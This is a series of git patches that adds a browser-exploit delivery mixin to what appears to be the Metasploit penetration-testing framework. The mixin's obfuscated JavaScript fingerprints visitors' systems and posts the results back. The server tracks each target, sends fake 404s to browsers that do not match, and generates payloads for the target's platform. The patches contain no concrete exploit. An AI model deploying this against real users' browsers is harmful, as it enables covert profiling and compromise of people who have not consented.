From 00efad5c5dbb0d5b6acf31415a556c3c15e4f985 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 31 Oct 2013 13:17:06 -0500
Subject: [PATCH 01/73] Initial commit for BrowserExploitServer mixin

---
 lib/msf/core/exploit/browser/server.rb | 358 +++++++++++++++++++++++++
 lib/msf/core/exploit/http/server.rb    |   5 +
 lib/msf/core/exploit/mixins.rb         |   2 +
 3 files changed, 365 insertions(+)
 create mode 100644 lib/msf/core/exploit/browser/server.rb

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
new file mode 100644
index 0000000000..e9f6e44660
--- /dev/null
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -0,0 +1,358 @@
+# -*- coding: binary -*-
+
+require 'erb'
+require 'rex/exploitation/js'
+
+###
+#
+# The BrowserExploitServer mixin provides methods to acheive common tasks seen in modern browser
+# exploitation, and is designed to work against common setups such as on Windows, OSX, and Linux.
+#
+###
+
+module Msf
+  module Exploit::Remote::BrowserExploitServer
+
+    include Msf::Exploit::Remote::HttpServer
+    include Msf::Exploit::Remote::HttpServer::HTML
+    include Msf::Exploit::RopDb
+
+    def initialize(info={})
+      super
+
+      # Profile structure:
+      # {
+      #   'cookie' =>
+      #   {
+      #     'os_name'   => 'Windows',
+      #     'os_flavor' => 'something'
+      #     ...... etc ......
+      #   }
+      # }
+      # A profile should at least have info about the following:
+      # tag      : Hash key. This is either an actual cookie, or a MD5 hash of target IP + user-agent
+      # :source  : The data source. Either from 'script', or 'headers'. The 'script' source
+      #             should be more accureate in some scenarios like browser compatibility mode
+      # :ua_name : The name of the browser
+      # :ua_ver  : The version of the browser
+      # :os_name : The name of the OS
+      # :language: The system's language
+      # :arch    : The system's arch
+      # :proxy   : Indicates whether proxy is used
+      #
+      # For more info about what the actual value might be for each key, see HttpServer.
+      #
+      # If the source is 'script', the profile might have even more information about plugins:
+      # 'office'  : The version of Microsoft Office (IE only)
+      @target_profiles = []
+
+      # Requirements are conditions that the browser must have in order to be exploited.
+      # They must be defined by the module, and the mixin should check them before the
+      # exploit is actually deployed.
+      @requirements = {}
+
+      @info_receiver_page     = "info"
+      @exploit_receiver_page  = "exploit"
+      @noscript_receiver_page = "noscript"
+
+    register_options(
+      [
+        OptBool.new('Retries', [false,  "Allow the browser to retry the module", true])
+      ], Exploit::Remote::BrowserExploitServer)
+    end
+
+    #
+    # Defines requirements by the module.
+    # The keys the module can define are the same as the ones in @target_profiles
+    #
+    def requirements(reqs={})
+      @requirements = reqs
+    end
+
+    #
+    # Returns an array of items that do not meet the requirements
+    #
+    def has_bad_requirements?(target_profile)
+      profile = target_profile[target_profile.first[0]]
+      bad_reqs = []
+
+      @requirements.each do |k, v|
+        if v.class == Regexp
+          bad_reqs << k if profile[k] !~ v
+        else
+          bad_reqs << k if profile[k] != v
+        end
+      end
+
+      bad_reqs
+    end
+
+    #
+    # Returns the target profile based on the tag
+    #
+    def get_profile(tag)
+      @target_profiles.each do |profile|
+        return profile if profile[tag]
+      end
+
+      nil
+    end
+
+    #
+    # Updates information for a specific profile
+    #
+    def update_profile(target_profile, key, value)
+      target_profile[target_profile.first[0]][key] = value
+    end
+
+    #
+    # Initializes a profile
+    #
+    def init_profile(tag)
+      @target_profiles << {tag => {}}
+    end
+
+    #
+    # Retrieves a tag.
+    # First it obtains the tag from the browser's "Cookie" header.
+    # If the header is empty (possible if the browser has cookies disabled),
+    # then it will return a tag based on IP + the user-agent.
+    #
+    def retreive_tag(request)
+      tag = request.headers['Cookie'].to_s
+
+      if tag.blank?
+        # Browser probably doesn't allow cookies, plan B :-/
+        ip = cli.peerhost
+        os = request.headers['User-Agent']
+        tag = Rex::Text.md5("#{ip}#{os}")
+      end
+
+      tag
+    end
+
+    #
+    # Registers target information to @target_profiles
+    # Acceptable sources include :script, and :headers
+    #
+    def process_user_info(source, cli, request)
+      tag = retreive_tag(request)
+
+      # Browser doesn't allow cookies. Can't track that, use a different way to track.
+      init_profile(tag) if request.headers['Cookie'].blank?
+      target_profile = get_profile(tag)
+
+      # Gathering target info from the detection stage
+      case source
+      when :script
+        # Gathers target data from a POST request
+        update_profile(target_profile, :source, 'script')
+        raw = Rex::Text.decode_base64(Rex::Text.uri_decode(request.body))
+        raw.split('&').each do |item|
+          k, v = item.scan(/(\w+)=(.+)/).flatten
+          update_profile(target_profile, k.to_sym, v)
+        end
+
+      when :headers
+        # Gathers target data from headers
+        # This may be less accureate, and most likely less info.
+        fp = fingerprint_user_agent(request.headers['User-Agent'])
+        # Module has all the info it needs, ua_string is kind of pointless.
+        # Kill this to save space.
+        fp.delete(:ua_string)
+        update_profile(target_profile, :source, 'headers')
+        fp.each do |k, v|
+          update_profile(target_profile, k.to_sym, v)
+        end
+      end
+
+      # Other detections
+      update_profile(target_profile, :proxy, has_proxy?(request))
+      update_profile(target_profile, :language, request.headers['Accept-Language'] || '')
+
+      report_client({
+        :host      => cli.peerhost,
+        :ua_string => request.headers['User-Agent'],
+        :ua_name   => target_profile[tag]['ua_name'],
+        :ua_ver    => target_profile[tag]['ua_ver']
+      })
+    end
+
+    #
+    # Checks if the target is running a proxy
+    #
+    def has_proxy?(request)
+      proxy_list =
+      [
+        'HTTP_VIA', 'HTTP_X_FORWARDED_FOR', 'HTTP_FORWARDED_FOR', 'HTTP_X_FORWARDED',
+        'HTTP_FORWARDED', 'HTTP_CLIENT_IP', 'HTTP_FORWARDED_FOR_IP', 'VIA', 'X_FORWARDED_FOR',
+        'FORWARDED_FOR', 'X_FORWARDED', 'FORWARDED', 'CLIENT_IP', 'FORWARDED_FOR_IP',
+        'HTTP_PROXY_CONNECTION'
+      ].each do |name|
+        return true if request[name]
+      end
+
+      false
+    end
+
+    #
+    # Returns the code for client-side detection
+    #
+    def get_detection_html
+      js = ::Rex::Exploitation::JSObfu.new %Q|
+      #{js_base64}
+      #{js_os_detect}
+      #{js_addons_detect}
+
+      function postInfo(data) {
+        var xmlHttp = '';
+        if (window.XMLHttpRequest) {
+          xmlHttp = new XMLHttpRequest();
+        }
+        else {
+         xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
+        }
+
+        if (xmlHttp.overrideMimeType) {
+         xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
+        }
+
+        xmlHttp.open('POST', "#{get_resource}/#{@info_receiver_page}/", false);
+        xmlHttp.send(data);
+      }
+
+      function objToQuery(obj) {
+        var q = [];
+        for (var key in obj) {
+          q.push(key + '=' + obj[key]);
+        }
+        return escape(Base64.encode(q.join('&')));
+      }
+
+      window.onload = function() {
+        var osInfo = window.os_detect.getVersion();
+        var d = {
+          "os_name"   : osInfo.os_name,
+          "os_flavor" : osInfo.os_flavor,
+          "ua_name"   : osInfo.ua_name,
+          "ua_ver"    : osInfo.ua_version,
+          "arch"      : osInfo.arch,
+          "office"    : window.addons_detect.getMsOfficeVersion()
+        };
+        var query = objToQuery(d);
+        postInfo(query);
+        window.location = "#{get_resource}/#{@exploit_receiver_page}/";
+      }
+      |
+
+      js.obfuscate
+
+      %Q|
+      <script>
+      #{js}
+      </script>
+      <noscript>
+      <img style="visibility:hidden" src="#{get_resource}/#{@noscript_receiver_page}/">
+      <meta http-equiv="refresh" content="1; url=#{get_resource}/#{@exploit_receiver_page}/">
+      </noscript>
+      |
+    end
+
+    #
+    # Handles exploit stages.
+    #
+    def on_request_uri(cli, request)
+      case request.uri
+      when /^#{get_resource}$/
+        #
+        # This is the information gathering stage
+        #
+        print_status("Gathering target information.")
+        tag = Rex::Text.rand_text_alpha(rand(20) + 5)
+        init_profile(tag)
+        html = get_detection_html
+        send_response(cli, html, {'Set-Cookie' => tag})
+
+      when /#{@info_receiver_page}/
+        #
+        # The detection code will hit this if Javascript is enabled
+        #
+        process_user_info(source=:script, cli, request)
+        send_response(cli, '')
+
+      when /#{@noscript_receiver_page}/
+        #
+        # The detection code will hit this instead of Javascript is disabled
+        # Should only be triggered by the img src in <noscript>
+        #
+        process_user_info(source=:headers, cli, request)
+        send_not_found(cli)
+
+      when /#{@exploit_receiver_page}/
+        #
+        # This sends the actual exploit. A module should define its own
+        # on_request_exploit() to get the target information
+        #
+        tag = retreive_tag(request)
+        target_profile = get_profile(tag)
+        if target_profile[tag][:tried] and datastore['Retries'] == false
+          print_status("Target with tag \"#{tag}\" wants to retry the module, not allowed.")
+          send_not_found(cli)
+        else
+          update_profile(target_profile, :tried, true)
+          bad_reqs = has_bad_requirements?(target_profile)
+          if bad_reqs.empty?
+            method(:on_request_exploit).call(cli, request, target_profile)
+          else
+            print_error("Exploit requirement(s) not met: #{bad_reqs * ', '}")
+            send_not_found(cli)
+          end
+        end
+
+      else
+        send_not_found(cli)
+      end
+    end
+
+    #
+    # Overriding method. The module should override this.
+    #
+    def on_request_exploit(cli, request, target_info)
+    end
+
+    #
+    # Converts an ERB-based exploit template into HTML, and sends to client
+    #
+    def send_exploit_html(cli, template, headers={})
+      html = ERB.new(template).result
+      send_response(cli, html)
+    end
+
+  end
+end
+
+=begin
+ 
+ Notes:
+ Make sure to add this in mixin.rb:
+ require 'msf/core/exploit/browser/server'
+
+  Need to add the addons js in server.rb:
+  @cache_os_addons      = nil
+  ...
+  def js_addons_detect
+    @cache_addons_detect ||= ::Rex::Exploitation::Js::Detect.addons
+  end
+
+  # modified:   lib/msf/core/exploit/http/server.rb
+  # modified:   lib/msf/core/exploit/mixins.rb
+
+  * Still need to implement:
+    - Function for target-specific payload
+    - Testing (different platforms/browsers/scenarios). At least test these common setups:
+      * Windows: Latest Chrome, Internet Explorer 6/7/8/9/10, latest Firefox, latest Opera, latest Safari
+      * OSX: Safari, Chrome, Firefox
+      * Linux: Firefox, Chrome
+    - Rspec
+
+=end
diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb
index f185497061..51233507b4 100644
--- a/lib/msf/core/exploit/http/server.rb
+++ b/lib/msf/core/exploit/http/server.rb
@@ -686,6 +686,7 @@ protected
     @cache_property_spray = nil
     @cache_heap_spray     = nil
     @cache_os_detect      = nil
+    @cache_os_addons      = nil
   end
 
   #
@@ -813,6 +814,10 @@ protected
     @cache_os_detect ||= ::Rex::Exploitation::Js::Detect.os
   end
 
+  def js_addons_detect
+    @cache_addons_detect ||= ::Rex::Exploitation::Js::Detect.addons
+  end
+
   # Transmits a html response to the supplied client
   #
   # HTML evasions are implemented here.
diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb
index b1dd01add0..2b15219913 100644
--- a/lib/msf/core/exploit/mixins.rb
+++ b/lib/msf/core/exploit/mixins.rb
@@ -97,3 +97,5 @@ require 'msf/core/exploit/winrm'
 
 # WebApp
 require 'msf/core/exploit/web'
+
+require 'msf/core/exploit/browser/server'

From 735b879e3cc226b7c115bcc987f4a9b0f6a22d14 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 31 Oct 2013 13:18:45 -0500
Subject: [PATCH 02/73] Add an example/testcase for BrowserExploitServer

---
 .../exploits/test/browserexploitserver.rb     | 80 +++++++++++++++++++
 1 file changed, 80 insertions(+)
 create mode 100644 test/modules/exploits/test/browserexploitserver.rb

diff --git a/test/modules/exploits/test/browserexploitserver.rb b/test/modules/exploits/test/browserexploitserver.rb
new file mode 100644
index 0000000000..799ab29e23
--- /dev/null
+++ b/test/modules/exploits/test/browserexploitserver.rb
@@ -0,0 +1,80 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "IE Exploit for BrowserExploitServer Proof-of-Concept",
+      'Description'    => %q{
+        Here's an example of building an exploit using the BrowserExploitServer.
+        This example requires the target to be exploit. If not, the mixin will
+        send a fake 404 as a way to avoid engaging the target.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'sinn3r' ],
+      'References'     =>
+        [
+          [ 'URL', 'http://metasploit.com' ]
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Automatic', {} ]
+        ],
+      'Payload'        =>
+        {
+          'BadChars'        => "\x00",  #Our spray doesn't like null bytes
+          'StackAdjustment' => -3500
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => "Apr 1 2013",
+      'DefaultTarget'  => 0))
+
+    # You can see what you can see by doing this in on_request_exploit():
+    # print_debug(target_info.inspect)
+    requirements({
+      :source  => /script|headers/i,
+      :os_name => /win/i
+    })
+  end
+
+  def exploit_template
+    # "user_profile" is a hash that stores the following information:
+    # - :ip        ; IP addressed used to connnect to the exploit
+    # - :useragent ; User-Agent
+    # - :plugins   ; All the plugins the browser runs
+    # - :cookie    ; A unique value assigned to the user as a way to tag them.
+    #profile = user_profile
+
+    %Q|
+    <% msg = "This page is generated by an exploit" %>
+    <%=msg%>
+    |
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_debug("I got this user: #{target_info.inspect}")
+    print_status("Sending exploit HTML...")
+    send_exploit_html(cli, exploit_template)
+  end
+
+
+  def exploit
+    super
+  end
+
+end
+
+=begin
+
+{"rMWwSAwBHLoESpHbEGbsv"=>{:source=>"script", :os_name=>"Microsoft Windows", :os_flavor=>"XP", :ua_name=>"MSIE", :ua_ver=>"8.0", :arch=>"x86", :office=>"null", :proxy=>false, :language=>"en-us", :tried=>true}}
+
+=end
\ No newline at end of file

From 6e7e5a0ff9a8f3fc714de8191d063ac92a42c303 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 31 Oct 2013 13:55:22 -0500
Subject: [PATCH 03/73] Put postInfo() in the js directory

---
 data/js/network/ajax_post.js           | 16 +++++++++
 lib/msf/core/exploit/browser/server.rb | 48 +++++---------------------
 lib/msf/core/exploit/http/server.rb    |  9 +++++
 lib/rex/exploitation/js/network.rb     | 12 +++++++
 4 files changed, 46 insertions(+), 39 deletions(-)
 create mode 100644 data/js/network/ajax_post.js

diff --git a/data/js/network/ajax_post.js b/data/js/network/ajax_post.js
new file mode 100644
index 0000000000..1f66b025fc
--- /dev/null
+++ b/data/js/network/ajax_post.js
@@ -0,0 +1,16 @@
+function postInfo(path, data) {
+  var xmlHttp = '';
+  if (window.XMLHttpRequest) {
+    xmlHttp = new XMLHttpRequest();
+  }
+  else {
+    xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
+  }
+
+  if (xmlHttp.overrideMimeType) {
+    xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
+  }
+
+  xmlHttp.open('POST', path, false);
+  xmlHttp.send(data);
+}
\ No newline at end of file
diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index e9f6e44660..49121fcbb5 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -203,23 +203,7 @@ module Msf
       #{js_base64}
       #{js_os_detect}
       #{js_addons_detect}
-
-      function postInfo(data) {
-        var xmlHttp = '';
-        if (window.XMLHttpRequest) {
-          xmlHttp = new XMLHttpRequest();
-        }
-        else {
-         xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
-        }
-
-        if (xmlHttp.overrideMimeType) {
-         xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
-        }
-
-        xmlHttp.open('POST', "#{get_resource}/#{@info_receiver_page}/", false);
-        xmlHttp.send(data);
-      }
+      #{js_ajax_post}
 
       function objToQuery(obj) {
         var q = [];
@@ -240,7 +224,7 @@ module Msf
           "office"    : window.addons_detect.getMsOfficeVersion()
         };
         var query = objToQuery(d);
-        postInfo(query);
+        postInfo("#{get_resource}/#{@info_receiver_page}/", query);
         window.location = "#{get_resource}/#{@exploit_receiver_page}/";
       }
       |
@@ -332,27 +316,13 @@ module Msf
 end
 
 =begin
- 
- Notes:
- Make sure to add this in mixin.rb:
- require 'msf/core/exploit/browser/server'
 
-  Need to add the addons js in server.rb:
-  @cache_os_addons      = nil
-  ...
-  def js_addons_detect
-    @cache_addons_detect ||= ::Rex::Exploitation::Js::Detect.addons
-  end
-
-  # modified:   lib/msf/core/exploit/http/server.rb
-  # modified:   lib/msf/core/exploit/mixins.rb
-
-  * Still need to implement:
-    - Function for target-specific payload
-    - Testing (different platforms/browsers/scenarios). At least test these common setups:
-      * Windows: Latest Chrome, Internet Explorer 6/7/8/9/10, latest Firefox, latest Opera, latest Safari
-      * OSX: Safari, Chrome, Firefox
-      * Linux: Firefox, Chrome
-    - Rspec
+* Still need to implement:
+  - Function for target-specific payload
+  - Testing (different platforms/browsers/scenarios). At least test these common setups:
+    * Windows: Latest Chrome, Internet Explorer 6/7/8/9/10, latest Firefox, latest Opera, latest Safari
+    * OSX: Safari, Chrome, Firefox
+    * Linux: Firefox, Chrome
+  - Rspec
 
 =end
diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb
index 51233507b4..f34eb9c14a 100644
--- a/lib/msf/core/exploit/http/server.rb
+++ b/lib/msf/core/exploit/http/server.rb
@@ -682,6 +682,7 @@ protected
     # Cache Javascript
     @cache_base64         = nil
     @cache_ajax_download  = nil
+    @cache_ajax_post      = nil
     @cache_mstime_malloc  = nil
     @cache_property_spray = nil
     @cache_heap_spray     = nil
@@ -745,6 +746,14 @@ protected
   end
 
 
+  #
+  # Transfers data using a POST request
+  #
+  def js_ajax_post
+    @cache_ajax_post ||= Rex::Exploitation::Js::Network.ajax_post
+  end
+
+
   #
   # This function takes advantage of MSTIME's CTIMEAnimationBase::put_values function that's
   # suitable for a no-spray technique.  There should be an allocation that contains an array of
diff --git a/lib/rex/exploitation/js/network.rb b/lib/rex/exploitation/js/network.rb
index ae206dcd40..65fd3389f9 100644
--- a/lib/rex/exploitation/js/network.rb
+++ b/lib/rex/exploitation/js/network.rb
@@ -22,6 +22,18 @@ class Network
       }).obfuscate
   end
 
+
+  def self.ajax_post
+    js = ::File.read(::File.join(Msf::Config.data_directory, "js", "network", "ajax_post.js"))
+
+    ::Rex::Exploitation::ObfuscateJS.new(js,
+      {
+        'Symbols' => {
+          'Variables' => %w{ xmlHttp }
+        }
+      }).obfuscate
+  end
+
 end
 end
 end

From 10fd892827de37f0878a7e2cf367951e66f8f2e0 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 31 Oct 2013 14:06:05 -0500
Subject: [PATCH 04/73] Fix a "undefined method to_sym" bug

If something is undetectable, the value may be empty, which triggers
a undefined method error because the regex always assumes there is
something. So instead of +, we use *.
---
 lib/msf/core/exploit/browser/server.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index 49121fcbb5..9b833cd527 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -149,7 +149,7 @@ module Msf
         update_profile(target_profile, :source, 'script')
         raw = Rex::Text.decode_base64(Rex::Text.uri_decode(request.body))
         raw.split('&').each do |item|
-          k, v = item.scan(/(\w+)=(.+)/).flatten
+          k, v = item.scan(/(\w+)=(.*)/).flatten
           update_profile(target_profile, k.to_sym, v)
         end
 

From 8a0ebcbac7901a35b0cc4c2d11b5df25f8ac06d0 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 31 Oct 2013 14:34:38 -0500
Subject: [PATCH 05/73] Adds method get_module_resource

---
 lib/msf/core/exploit/browser/server.rb | 10 ++++++++++
 1 file changed, 10 insertions(+)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index 9b833cd527..5b94daca1f 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -61,6 +61,16 @@ module Msf
       ], Exploit::Remote::BrowserExploitServer)
     end
 
+
+    #
+    # Returns the resource (URI) to the module
+    # Similar to get_resource, this method will allow whatever is requesting this URI to access
+    # on_request_exploit
+    #
+    def get_module_resource
+      "#{get_resource.chomp("/")}/#{@exploit_receiver_page}"
+    end
+
     #
     # Defines requirements by the module.
     # The keys the module can define are the same as the ones in @target_profiles

From 391360d67fde732c06d60b298dfdfc79554cf60c Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 31 Oct 2013 16:09:05 -0500
Subject: [PATCH 06/73] Update xmlhttprequest

---
 data/js/network/ajax_download.js | 9 ++++++++-
 data/js/network/ajax_post.js     | 9 ++++++++-
 2 files changed, 16 insertions(+), 2 deletions(-)

diff --git a/data/js/network/ajax_download.js b/data/js/network/ajax_download.js
index 560d3d22ae..90329f51d3 100644
--- a/data/js/network/ajax_download.js
+++ b/data/js/network/ajax_download.js
@@ -11,7 +11,14 @@ function ajax_download(oArg) {
     xmlHttp = new XMLHttpRequest();
   }
   else {
-    xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
+    var objs = ["Microsoft.XMLHTTP", "Msxml2.XMLHTTP", "Msxml2.XMLHTTP.4.0"];
+    for (var i=0; i < objs.length; i++) {
+      try {
+        xmlHttp = new ActiveXObject(objs[i]);
+        break;
+      }
+      catch (e) {}
+    }
   }
 
   if (xmlHttp.overrideMimeType) {
diff --git a/data/js/network/ajax_post.js b/data/js/network/ajax_post.js
index 1f66b025fc..02a70850c7 100644
--- a/data/js/network/ajax_post.js
+++ b/data/js/network/ajax_post.js
@@ -4,7 +4,14 @@ function postInfo(path, data) {
     xmlHttp = new XMLHttpRequest();
   }
   else {
-    xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
+    var objs = ["Microsoft.XMLHTTP", "Msxml2.XMLHTTP", "Msxml2.XMLHTTP.4.0"];
+    for (var i=0; i < objs.length; i++) {
+      try {
+        xmlHttp = new ActiveXObject(objs[i]);
+        break;
+      }
+      catch (e) {}
+    }
   }
 
   if (xmlHttp.overrideMimeType) {

From 828ef9c64c26ec9262e0e76c82d16fb2cb7aafa4 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 31 Oct 2013 18:54:01 -0500
Subject: [PATCH 07/73] Adds target-specific payload generator

---
 lib/msf/core/exploit/browser/server.rb | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index 5b94daca1f..a5cea30f90 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -322,9 +322,27 @@ module Msf
       send_response(cli, html)
     end
 
+    #
+    # Generates a target-specific payload.
+    # Should be called by the module.
+    #
+    def get_payload(cli, target_info)
+      tag      = target_info.first[0]
+      arch     = target_info[tag][:arch]
+      platform = target_info[tag][:os_name]
+
+      # Fix names for consisntecy so our API can find the right one
+      # Originally defined in lib/msf/core/constants.rb
+      platform = platform.gsub(/^Mac OS X$/, 'OSX')
+      platform = platform.gsub(/^Microsoft Windows$/, 'Windows')
+
+      regenerate_payload(cli, platform, arch).encoded
+    end
+
   end
 end
 
+
 =begin
 
 * Still need to implement:

From 94d62613ab5b07223147cfc7bca78bfc50e7d613 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 31 Oct 2013 19:04:11 -0500
Subject: [PATCH 08/73] Pretty much done with these, remove these comments.

---
 lib/msf/core/exploit/browser/server.rb | 13 -------------
 1 file changed, 13 deletions(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index a5cea30f90..c95e35fcc5 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -341,16 +341,3 @@ module Msf
 
   end
 end
-
-
-=begin
-
-* Still need to implement:
-  - Function for target-specific payload
-  - Testing (different platforms/browsers/scenarios). At least test these common setups:
-    * Windows: Latest Chrome, Internet Explorer 6/7/8/9/10, latest Firefox, latest Opera, latest Safari
-    * OSX: Safari, Chrome, Firefox
-    * Linux: Firefox, Chrome
-  - Rspec
-
-=end

From 21891a833702f5b575911923393539492e2b6e77 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 31 Oct 2013 23:08:17 -0500
Subject: [PATCH 09/73] Make sure the browser can't retry by going to the first
 URL

---
 lib/msf/core/exploit/browser/server.rb | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index c95e35fcc5..439d9018a6 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -261,6 +261,11 @@ module Msf
         #
         # This is the information gathering stage
         #
+        if get_profile(retreive_tag(request))
+          send_redirect(cli, "#{get_resource}/#{@exploit_receiver_page}")
+          return
+        end
+
         print_status("Gathering target information.")
         tag = Rex::Text.rand_text_alpha(rand(20) + 5)
         init_profile(tag)

From 5851d502b54abdbdf827e0a80da599427ef626b7 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 31 Oct 2013 23:12:20 -0500
Subject: [PATCH 10/73] Rename some stuff

---
 lib/msf/core/exploit/browser/server.rb | 16 ++++++++--------
 1 file changed, 8 insertions(+), 8 deletions(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index 439d9018a6..c131ca6795 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -145,7 +145,7 @@ module Msf
     # Registers target information to @target_profiles
     # Acceptable sources include :script, and :headers
     #
-    def process_user_info(source, cli, request)
+    def process_browser_info(source, cli, request)
       tag = retreive_tag(request)
 
       # Browser doesn't allow cookies. Can't track that, use a different way to track.
@@ -276,7 +276,7 @@ module Msf
         #
         # The detection code will hit this if Javascript is enabled
         #
-        process_user_info(source=:script, cli, request)
+        process_browser_info(source=:script, cli, request)
         send_response(cli, '')
 
       when /#{@noscript_receiver_page}/
@@ -284,7 +284,7 @@ module Msf
         # The detection code will hit this instead of Javascript is disabled
         # Should only be triggered by the img src in <noscript>
         #
-        process_user_info(source=:headers, cli, request)
+        process_browser_info(source=:headers, cli, request)
         send_not_found(cli)
 
       when /#{@exploit_receiver_page}/
@@ -316,7 +316,7 @@ module Msf
     #
     # Overriding method. The module should override this.
     #
-    def on_request_exploit(cli, request, target_info)
+    def on_request_exploit(cli, request, browser_info)
     end
 
     #
@@ -331,10 +331,10 @@ module Msf
     # Generates a target-specific payload.
     # Should be called by the module.
     #
-    def get_payload(cli, target_info)
-      tag      = target_info.first[0]
-      arch     = target_info[tag][:arch]
-      platform = target_info[tag][:os_name]
+    def get_payload(cli, browser_info)
+      tag      = browser_info.first[0]
+      arch     = browser_info[tag][:arch]
+      platform = browser_info[tag][:os_name]
 
       # Fix names for consisntecy so our API can find the right one
       # Originally defined in lib/msf/core/constants.rb

From 7a33c48a0fe66d369dec28ee79532a0304d466c2 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 31 Oct 2013 23:17:38 -0500
Subject: [PATCH 11/73] No double slash

---
 lib/msf/core/exploit/browser/server.rb | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index c131ca6795..7070fcaa59 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -234,8 +234,8 @@ module Msf
           "office"    : window.addons_detect.getMsOfficeVersion()
         };
         var query = objToQuery(d);
-        postInfo("#{get_resource}/#{@info_receiver_page}/", query);
-        window.location = "#{get_resource}/#{@exploit_receiver_page}/";
+        postInfo("#{get_resource.chomp("/")}/#{@info_receiver_page}/", query);
+        window.location = "#{get_resource.chomp("/")}/#{@exploit_receiver_page}/";
       }
       |
 
@@ -246,8 +246,8 @@ module Msf
       #{js}
       </script>
       <noscript>
-      <img style="visibility:hidden" src="#{get_resource}/#{@noscript_receiver_page}/">
-      <meta http-equiv="refresh" content="1; url=#{get_resource}/#{@exploit_receiver_page}/">
+      <img style="visibility:hidden" src="#{get_resource.chomp("/")}/#{@noscript_receiver_page}/">
+      <meta http-equiv="refresh" content="1; url=#{get_resource.chomp("/")}/#{@exploit_receiver_page}/">
       </noscript>
       |
     end
@@ -262,7 +262,7 @@ module Msf
         # This is the information gathering stage
         #
         if get_profile(retreive_tag(request))
-          send_redirect(cli, "#{get_resource}/#{@exploit_receiver_page}")
+          send_redirect(cli, "#{get_resource.chomp("/")}/#{@exploit_receiver_page}")
           return
         end
 

From d54c8a359be4123967941be02989c589db21b164 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 31 Oct 2013 23:42:43 -0500
Subject: [PATCH 12/73] Fix bug in proxy detection

---
 lib/msf/core/exploit/browser/server.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index 7070fcaa59..d98044698f 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -199,7 +199,7 @@ module Msf
         'FORWARDED_FOR', 'X_FORWARDED', 'FORWARDED', 'CLIENT_IP', 'FORWARDED_FOR_IP',
         'HTTP_PROXY_CONNECTION'
       ].each do |name|
-        return true if request[name]
+        return true if request.headers[name]
       end
 
       false

